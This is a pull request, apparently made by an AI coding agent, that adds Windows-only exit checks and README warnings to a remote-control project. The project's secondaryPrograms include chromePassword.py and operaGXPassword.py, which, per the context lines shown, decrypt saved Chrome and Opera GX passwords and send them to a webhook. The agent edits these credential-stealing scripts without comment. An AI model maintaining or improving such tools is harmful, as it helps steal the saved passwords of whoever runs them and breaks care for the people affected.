### PR TITLE
Add Windows-only guards and clarify README

### DIFF
--- a/README.md
+++ b/README.md
@@ -4,6 +4,11 @@
 
 Alt Control Panel is a Python-based remote control application designed for managing a secondary computer (referred to as "Alt") over a network. It provides functionalities such as file management, task management, terminal command execution, and screenshot capture via a Flask web interface.
 
+> **Warning**
+> The server-side scripts (`alt.py`, `bootstrapper.py`, and the utilities in
+> `secondaryPrograms/`) rely on Windows-specific APIs. These programs will exit
+> immediately on non-Windows systems.
+
 ## Features
 
 - **File Management**:
@@ -127,7 +132,9 @@ Use the web interface to:
 
 ## Limitations
 
-- **Windows-Only**: Currently optimized for Windows operating systems.
+- **Windows-Only**: The server components run solely on Windows. Other
+  operating systems are not supported and the scripts will exit immediately on
+  those systems.
 - **Permissions**: Some directories or files may be inaccessible due to permission restrictions.
 - **Network Access**: Requires both machines to be on the same network or have proper port forwarding configured.
 

--- a/alt.py
+++ b/alt.py
@@ -9,6 +9,12 @@ import time
 import cv2
 import numpy as np
 import ctypes
+import platform
+import sys
+
+if platform.system() != "Windows":
+    sys.stderr.write("alt.py is only supported on Windows.\n")
+    sys.exit(0)
 
 app = Flask(__name__)
 CORS(app, resources={r"/*": {"origins": "*", "methods": ["GET", "POST", "OPTIONS"], "allow_headers": "*"}})

--- a/bootstrapper.py
+++ b/bootstrapper.py
@@ -2,6 +2,12 @@ import os
 import requests
 import subprocess
 import time
+import platform
+import sys
+
+if platform.system() != "Windows":
+    sys.stderr.write("bootstrapper.py can only run on Windows.\n")
+    sys.exit(0)
 
 # === CONFIGURATION ===
 CONTACTS_DIR = os.path.join(os.path.expanduser("~"), "Contacts")

--- a/secondaryPrograms/chromePassword.py
+++ b/secondaryPrograms/chromePassword.py
@@ -9,6 +9,12 @@ from Cryptodome.Cipher import AES
 import shutil
 import csv
 import requests  # For sending data to the webhook
+import platform
+import sys
+
+if platform.system() != "Windows":
+    sys.stderr.write("chromePassword.py can only run on Windows.\n")
+    sys.exit(0)
 
 # GLOBAL CONSTANT
 CHROME_PATH_LOCAL_STATE = os.path.normpath(r"%s\AppData\Local\Google\Chrome\User Data\Local State" % (os.environ['USERPROFILE']))

--- a/secondaryPrograms/operaGXPassword.py
+++ b/secondaryPrograms/operaGXPassword.py
@@ -9,6 +9,12 @@ from Cryptodome.Cipher import AES
 import shutil
 import csv
 import requests  # For sending data to the webhook
+import platform
+import sys
+
+if platform.system() != "Windows":
+    sys.stderr.write("operaGXPassword.py can only run on Windows.\n")
+    sys.exit(0)
 
 # GLOBAL CONSTANT
 OPERA_GX_PATH_LOCAL_STATE = os.path.normpath(r"%APPDATA%\Opera Software\Opera GX Stable\Local State")


### PR DESCRIPTION
## Summary
- add platform checks to exit scripts on non-Windows systems
- document Windows-only support clearly in the README

## Testing
- `python -m py_compile alt.py bootstrapper.py secondaryPrograms/chromePassword.py secondaryPrograms/operaGXPassword.py`

------
https://chatgpt.com/codex/tasks/task_e_68450da48ad083229a56db8f762f4eb7